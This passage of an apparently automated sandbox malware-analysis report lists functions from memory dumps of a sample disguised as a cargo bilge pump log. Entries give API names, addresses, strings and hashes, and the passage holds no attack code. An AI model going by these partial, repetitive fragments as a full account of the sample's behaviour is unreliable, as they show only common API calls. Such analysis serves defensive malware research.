Opcode Fuzzy Hash: 7a8f893b6a66d5b37d2d5fc319a0394a2df2b95505dd0aa26adfa403df6f2647
Instruction Fuzzy Hash: 6151C3B1D003199FDB14DF99C984ADEBBB6FF48314F24822AE419AB210D7B1A945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 04C28AE6 Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04C28C02

Memory Dump Source

Source File: 00000000.00000002.2045787649.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c20000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: fda1b6253b0f0154c225d3bcdf325594367a4d2e1371ea8391dca9590033ea15
Instruction ID: 22eb45bb9e8b1b0eca76f513e3dae55f0285ab01867d5ca6d3c6283f29a8f7c5
Opcode Fuzzy Hash: fda1b6253b0f0154c225d3bcdf325594367a4d2e1371ea8391dca9590033ea15
Instruction Fuzzy Hash: 2651C3B1D003199FDB14DF99C984ADEFBB5BF48314F24822AE419AB210D7B4A985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 04C26DE4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04C2B171

Memory Dump Source

Source File: 00000000.00000002.2045787649.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c20000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: dd3c2a1b1108aa5b1194a86cc2cc29a443fa6b31d1670c52dcb41fa57962277b
Instruction ID: 7090defb210d5fd677ed2ef3de4f0503787084508cb30ab4471158da66392b75
Opcode Fuzzy Hash: dd3c2a1b1108aa5b1194a86cc2cc29a443fa6b31d1670c52dcb41fa57962277b
Instruction Fuzzy Hash: CF4137B8A00215CFDB14CF99C848BAAFBF6FB88314F24C459D519AB325D774B841CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04C23FB0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,04C2469E,?,?,?,?,?), ref: 04C2475F

Memory Dump Source

Source File: 00000000.00000002.2045787649.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c20000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e99ee6d25287a3a903b21be08e687b9fc34800f2d0b1af72559fbe41db02d5f7
Instruction ID: 1d99a4d2605b6377975e947a72f3e5b4cbd748c91025e3f48f64e3bd5c5acf1e
Opcode Fuzzy Hash: e99ee6d25287a3a903b21be08e687b9fc34800f2d0b1af72559fbe41db02d5f7
Instruction Fuzzy Hash: 5021E6B5D00258DFDB10CF9AD584ADEFBF9EB48714F14805AE914A7310D374A950CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 04C246D0 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,04C2469E,?,?,?,?,?), ref: 04C2475F

Memory Dump Source

Source File: 00000000.00000002.2045787649.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c20000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9979efa087b29eef4aa3b0ef926869ea6d5d2fa79d0571c68b4abf4610755609
Instruction ID: 88a7efc0206a2db2bfddf2fa76f0798a730165556d19c792584de8186ee614b4
Opcode Fuzzy Hash: 9979efa087b29eef4aa3b0ef926869ea6d5d2fa79d0571c68b4abf4610755609
Instruction Fuzzy Hash: 0021E4B5D00218DFDB10CFA9D584ADEFBF5FB48714F24802AE918A7250D374A954CF65

Uniqueness

Uniqueness Score: -1.00%

Function 06DEA1D0 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(00000000), ref: 06DEA240

Memory Dump Source

Source File: 00000000.00000002.2046761193.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6de0000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: da9b4d61cbddf472fd9a9fc0ad06acbbc6e90257d1f6a38fe909d5d9a363c650
Instruction ID: fd01c782db3172b4b62244c770115c7e19f5a9f8651b5f9fe1f5183723f54b1c
Opcode Fuzzy Hash: da9b4d61cbddf472fd9a9fc0ad06acbbc6e90257d1f6a38fe909d5d9a363c650
Instruction Fuzzy Hash: 751133B1C0066A9BCB20DF9AD444B9EFBB4BF48320F14812AD858B7250D338A940CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 04C22508 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04C235D9,00000800,00000000,00000000), ref: 04C237EA

Memory Dump Source

Source File: 00000000.00000002.2045787649.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c20000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8acece3f220548b4a921b4f4fa21246d9ee6d3cd4afb9e9bdb69199880da7ec3
Instruction ID: 29c251cb48e956f7fcc70479ebdda96350128199e7b6961b87428e4a531220c3
Opcode Fuzzy Hash: 8acece3f220548b4a921b4f4fa21246d9ee6d3cd4afb9e9bdb69199880da7ec3
Instruction Fuzzy Hash: 891117B69003599FDB10CFAAC544BDEFBF9EB48714F10842AD819A7210C3B9A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 04C2377A Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04C235D9,00000800,00000000,00000000), ref: 04C237EA

Memory Dump Source

Source File: 00000000.00000002.2045787649.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c20000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1f3803d1ad6edb24803d2cab86e6860fb842eee23441f267836e144102316af1
Instruction ID: 0b17a9bc69a39f730c0587753a8b50f6fec540b9a9ce5fbfd15002d21a2315cb
Opcode Fuzzy Hash: 1f3803d1ad6edb24803d2cab86e6860fb842eee23441f267836e144102316af1
Instruction Fuzzy Hash: 401137B6C003599FDB10CFAAD544BDEFBF5EB88710F10842AD819A7210C3B9A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 04C234F8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 04C2355E

Memory Dump Source

Source File: 00000000.00000002.2045787649.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c20000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d964f875defc023a29d3d09cbda3c4d818886c69b2c5f5ba2439c49f6beac8b9
Instruction ID: 1b8d193fa4f9ac137a23403700d7d2f6f8cfc60a06e9fac7533e44a210a9fb3e
Opcode Fuzzy Hash: d964f875defc023a29d3d09cbda3c4d818886c69b2c5f5ba2439c49f6beac8b9
Instruction Fuzzy Hash: E11113B5D002598FDB10CFAAC544ADEFBF5EF88314F10842AD819A7210D3B9A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04C234F4 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 04C2355E

Memory Dump Source

Source File: 00000000.00000002.2045787649.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c20000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2d70b9118de443d8afb855645158e4bd27fb07e7b1e5bfccf55e64b33c096c23
Instruction ID: 3cf083fab9f842afaf49ceaceb879a6e0fd8442db7b84ed9f73282aed54ad277
Opcode Fuzzy Hash: 2d70b9118de443d8afb855645158e4bd27fb07e7b1e5bfccf55e64b33c096c23
Instruction Fuzzy Hash: E41110B6D00259CFDB14CFAAC1446DEFBF5AF48314F10842AC969A7220C3B8A645CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0252AF58 Relevance: 1.5, Strings: 1, Instructions: 294COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0252AFBA

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 4632d00db1f8cb3483dba7d04c4b8660a2c69c2c947a66d6d94bcd8f63df7f03
Instruction ID: fee11c9886c4c7606b5b760777eaae9ce8bd13cbbe770bce039d350300c4fd09
Opcode Fuzzy Hash: 4632d00db1f8cb3483dba7d04c4b8660a2c69c2c947a66d6d94bcd8f63df7f03
Instruction Fuzzy Hash: BFC17D316002299FCB05DF68D884B6EBBB1FF45308F0580A9E9199B2E6C731ED59CB95

Uniqueness

Uniqueness Score: -1.00%

Function 07379909 Relevance: 1.5, APIs: 1, Instructions: 30windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 07379935

Memory Dump Source

Source File: 00000000.00000002.2047554865.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: bc81a6cb8c2525b43b6b444035c7f994c27cd789773e3d5822a2825d01726c9e
Instruction ID: 0823eff82aee6ab8f6e9dc887100abdd684e49cb3259e3336c34711d8b1a2f88
Opcode Fuzzy Hash: bc81a6cb8c2525b43b6b444035c7f994c27cd789773e3d5822a2825d01726c9e
Instruction Fuzzy Hash: 0AF0E7B5800309DFEB10CF89D444BDEBBF4EB49324F10841AE558A7210C379A584CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02525718 Relevance: 1.5, Strings: 1, Instructions: 253COMMON

Download Yara Rule

Strings

4'^q, xrefs: 025259AF

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: bd4b83315db3c44c79adf8c87067c86c278ad36f8a6e193f4b66ac8748688655
Instruction ID: bf00f80e6a1f7720e8c6de00e144c870935c8e37c48b0e3519c4fa858b570180
Opcode Fuzzy Hash: bd4b83315db3c44c79adf8c87067c86c278ad36f8a6e193f4b66ac8748688655
Instruction Fuzzy Hash: 8781C330B003049FDB08AB7899A477E7BEBFB89710F148869E505AB3D5DE359C09C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 0734A3D6 Relevance: 1.5, Strings: 1, Instructions: 239COMMON

Download Yara Rule

Strings

LR^q, xrefs: 0734A60F

Memory Dump Source

Source File: 00000000.00000002.2047521727.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 2396924f066ac199e9463f8840fd9f3016d7b83a48bc4c9c3594e6b961b568cf
Instruction ID: 6a6ed6a441678eae044cdd609617b30790f450ce9e051d29239ae0d2b4c263ab
Opcode Fuzzy Hash: 2396924f066ac199e9463f8840fd9f3016d7b83a48bc4c9c3594e6b961b568cf
Instruction Fuzzy Hash: 49612870B093918FD30AAB74D85922DBFF5AF86600F0544AAD4C9DB293DE3C590AC793

Uniqueness

Uniqueness Score: -1.00%

Function 02529770 Relevance: 1.5, Strings: 1, Instructions: 207COMMON

Download Yara Rule

Strings

4'^q, xrefs: 02529922

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 14e2259c836c786a709dbe623b3c457e9f663d7cbfeeb233953f76f6b32d4cd1
Instruction ID: af965b7895d1706d89f714f0d88cc51929e990bdbcc54373b234fd6f5884c758
Opcode Fuzzy Hash: 14e2259c836c786a709dbe623b3c457e9f663d7cbfeeb233953f76f6b32d4cd1
Instruction Fuzzy Hash: 1461D3317041258FCB14CF3AC894A6A7BE9FF8A664F294469E416CB3E5DB31DC09CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0734A444 Relevance: 1.4, Strings: 1, Instructions: 176COMMON

Download Yara Rule

Strings

LR^q, xrefs: 0734A60F

Memory Dump Source

Source File: 00000000.00000002.2047521727.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 6c3626473183ca2d48a8fbcf133f5debd7678a1853b9bba9b0b2a4e4a58c08ba
Instruction ID: 7e8c25dd1852c28a224872ad906765857003f6712ce86e73c81b62b6b72cf13f
Opcode Fuzzy Hash: 6c3626473183ca2d48a8fbcf133f5debd7678a1853b9bba9b0b2a4e4a58c08ba
Instruction Fuzzy Hash: 4F512370B092058FD709BFB9E49926EBBF5EB85604F0188ADD089D7391DE3C590AC793

Uniqueness

Uniqueness Score: -1.00%

Function 0734A487 Relevance: 1.4, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

LR^q, xrefs: 0734A60F

Memory Dump Source

Source File: 00000000.00000002.2047521727.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 51f4c998300ba21c1d67064058bac314ee5ca1a9e70fbf1d56f6f0509b24cdad
Instruction ID: 5b9ba8f3ca10bb1bb1b3762fe644d4b61d6c13c7444c7d25a743206dd08f6a31
Opcode Fuzzy Hash: 51f4c998300ba21c1d67064058bac314ee5ca1a9e70fbf1d56f6f0509b24cdad
Instruction Fuzzy Hash: D9510270B042058FD709BFB9E89922EBBF5AB84604F41886DD089D7391DE3C6D09C793

Uniqueness

Uniqueness Score: -1.00%

Function 02525B30 Relevance: 1.4, Strings: 1, Instructions: 150COMMON

Download Yara Rule

Strings

XX^q, xrefs: 02525BC7

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: XX^q
API String ID: 0-1315485225
Opcode ID: 5ea5d34bba896f3e082fafb86ad40e900fc38e0a092adac745ffacbae87c27ab
Instruction ID: 3a4f57ca576a30f0bc529bf07da72bef5d2b92933a96e2ddd9e8384ee30211e0
Opcode Fuzzy Hash: 5ea5d34bba896f3e082fafb86ad40e900fc38e0a092adac745ffacbae87c27ab
Instruction Fuzzy Hash: 6B51F471B002199FE7089B39C95876ABBE6FBC9700F60C869E0069B3D5EB319D48C790

Uniqueness

Uniqueness Score: -1.00%

Function 0734A4B0 Relevance: 1.4, Strings: 1, Instructions: 144COMMON

Download Yara Rule

Strings

LR^q, xrefs: 0734A60F

Memory Dump Source

Source File: 00000000.00000002.2047521727.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 338fabfc672ebb59972ef1a7ca33d3801459994ba3fe293a4d40c50ee426aeaf
Instruction ID: 1543db158dfcbeeb3c36eefedc75c9261b452e48ef02efef4505a9ad32714fa1
Opcode Fuzzy Hash: 338fabfc672ebb59972ef1a7ca33d3801459994ba3fe293a4d40c50ee426aeaf
Instruction Fuzzy Hash: 44419670B14615DBD708BFB9E48A62EBBF9EBC8704F40892CE54997340DE386949C793

Uniqueness

Uniqueness Score: -1.00%

Function 0252BCC8 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

Te^q, xrefs: 0252BD8D

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 9d8e551532cc6f4b54904dd43a0305507405750dee6c844391ad6c65b450bed7
Instruction ID: 4ac40154bb268a7a3722adc1d44c1f7c92b94861584dc05ad1d7bad22556b6c8
Opcode Fuzzy Hash: 9d8e551532cc6f4b54904dd43a0305507405750dee6c844391ad6c65b450bed7
Instruction Fuzzy Hash: A8512C34B102149FDB04DF69D994BAEBBF6BF89704F108469E506AB3E5CB709C45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0252B588 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

Xbq, xrefs: 0252B7AF

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: Xbq
API String ID: 0-63242295
Opcode ID: 0f7b51b0bbc2a8a7f8d087b54f5fa1328b01956a9a123fa784a3b117df2d8518
Instruction ID: d579181f07a9a294bdc6cbd8b2cace56dc97edee0b65e434b119806480fc943b
Opcode Fuzzy Hash: 0f7b51b0bbc2a8a7f8d087b54f5fa1328b01956a9a123fa784a3b117df2d8518
Instruction Fuzzy Hash: A9415339B18224DB8F596B34601833DB7ABFBCD705709891AE407D73C0CF695D0A87AA

Uniqueness

Uniqueness Score: -1.00%

Function 0252DB98 Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

Hbq, xrefs: 0252DC6F

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: Hbq
API String ID: 0-1245868
Opcode ID: 59bf391c348a5ea6291fbf418a4a73ccaae8e712c11afc7a8a3355c284fc753d
Instruction ID: 6ec1a11725b6952f5dbdd00b60841eefc16378ef382be513e31294c1da27f2e4
Opcode Fuzzy Hash: 59bf391c348a5ea6291fbf418a4a73ccaae8e712c11afc7a8a3355c284fc753d
Instruction Fuzzy Hash: 9A41BF313052249FCB15AF28D854A6A7FB6FF8A311F05806AE909DB3D1CB78DC15CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 02529570 Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

4'^q, xrefs: 025295EB

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 9358652fe84dc95291b19ec4935635bd0127e5f171916667b2c8c64c68a730af
Instruction ID: df36432a3e574a69c20a3edb1002fede01b0f94b1a831e8f9a3ef3dda6f95c44
Opcode Fuzzy Hash: 9358652fe84dc95291b19ec4935635bd0127e5f171916667b2c8c64c68a730af
Instruction Fuzzy Hash: 844148747002659FDB14DF68D898BAA7BB5FF49611F200469E906CB3E0C731ED45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 05C77AE0 Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

$^q, xrefs: 05C77B69

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: 3ee44b21e307c55ed4b171598b3004486db4ed045a604ffe9bacae263eb46ba5
Instruction ID: 88f2ae0cd28a59aae78a761875ac4a7e52e2a1fba1dd24f064283707416d7316
Opcode Fuzzy Hash: 3ee44b21e307c55ed4b171598b3004486db4ed045a604ffe9bacae263eb46ba5
Instruction Fuzzy Hash: DB216D3034410CCFDB54EB3AC858A2A7BE6FF8565171189A9E406CB7A2DEB1CD42CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0252A7E0 Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

W, xrefs: 0252A7ED

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: W
API String ID: 0-655174618
Opcode ID: 8508d74c6a5bd333fe922345e628d4171a4ea3cad7329df25c5e3ecd35a66838
Instruction ID: 993a3b36f6d16982c5b5bb88f79b48b761e3b4f8b4fa7d444d21978a35665bb2
Opcode Fuzzy Hash: 8508d74c6a5bd333fe922345e628d4171a4ea3cad7329df25c5e3ecd35a66838
Instruction Fuzzy Hash: BA315071E001158FCB04DF68C984A6EBBF6FF89324B158199E419973E5C774DC46CB94

Uniqueness

Uniqueness Score: -1.00%

Function 05C77ACF Relevance: 1.3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

Strings

$^q, xrefs: 05C77B69

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: 8e1169994fd47890d08e56e0f11e6cca1d7a55c95047ea144aa8c67c685c1c39
Instruction ID: 51087841539a131d77b62b1514f2a99ad13ca62c1b9706202485c695f4a67a37
Opcode Fuzzy Hash: 8e1169994fd47890d08e56e0f11e6cca1d7a55c95047ea144aa8c67c685c1c39
Instruction Fuzzy Hash: EB21923030450CCFDB14DB3AC858A297BE6FF85612B1548A9E416CB7B2DFB1C941CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02526142 Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

W, xrefs: 0252614D

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: W
API String ID: 0-655174618
Opcode ID: 9d50b8144cdf4ece9538dd4ad544ff859a8fd22bc32ce3a5a8898fa11fd290b1
Instruction ID: 238648b03c8aea980283ec737e89a11e09b8cbad8323eb45e8325d2d0c03e8de
Opcode Fuzzy Hash: 9d50b8144cdf4ece9538dd4ad544ff859a8fd22bc32ce3a5a8898fa11fd290b1
Instruction Fuzzy Hash: 24210532B042199FEB059F24E80472A7BBAFB88314F008069F9069F2D5CB34DC54CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02525998 Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

4'^q, xrefs: 025259AF

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 9d3d25dc3ea0269d8b9cd46ab30dcacf38b9b1150849d2e98a18d67614576244
Instruction ID: 63eacc12da9786e0152dcf282cf542e544c2bf1d080bf7a42d3c28529e0ddd59
Opcode Fuzzy Hash: 9d3d25dc3ea0269d8b9cd46ab30dcacf38b9b1150849d2e98a18d67614576244
Instruction Fuzzy Hash: 81016135F013141BEB097BB5646873E7BEBEBC9611700486ED406D7385DE269C0187E5

Uniqueness

Uniqueness Score: -1.00%

Function 05C705E8 Relevance: .8, Instructions: 779COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da41289e003e0ea538df57774542e10e1cb30e8a8d1a85f001bced25ef5159e4
Instruction ID: dd9e7f2045f93ba8b417f1423d52dc4b41aeeb78e2c1dd8698a41a097bd8e0b3
Opcode Fuzzy Hash: da41289e003e0ea538df57774542e10e1cb30e8a8d1a85f001bced25ef5159e4
Instruction Fuzzy Hash: 3B62BE70E01B858BDB749F7588883ADBAA1BB46300F544D2FD0EBCEA94DB349582CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0734E1FD Relevance: .7, Instructions: 706COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2047521727.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46e9c419187ac224052328654feb7c53f91e1ee83674aed75a9d13336948296f
Instruction ID: c820e72681ba1f9d6d3db62ca3d6b0ea69414dacfecedf596a2b7a9eb430d5ba
Opcode Fuzzy Hash: 46e9c419187ac224052328654feb7c53f91e1ee83674aed75a9d13336948296f
Instruction Fuzzy Hash: 0DD1A271B10615CFD708BFB9E88926DB7F6BF89704F414968D08997394DE38AC06CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0734E2B9 Relevance: .7, Instructions: 660COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2047521727.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

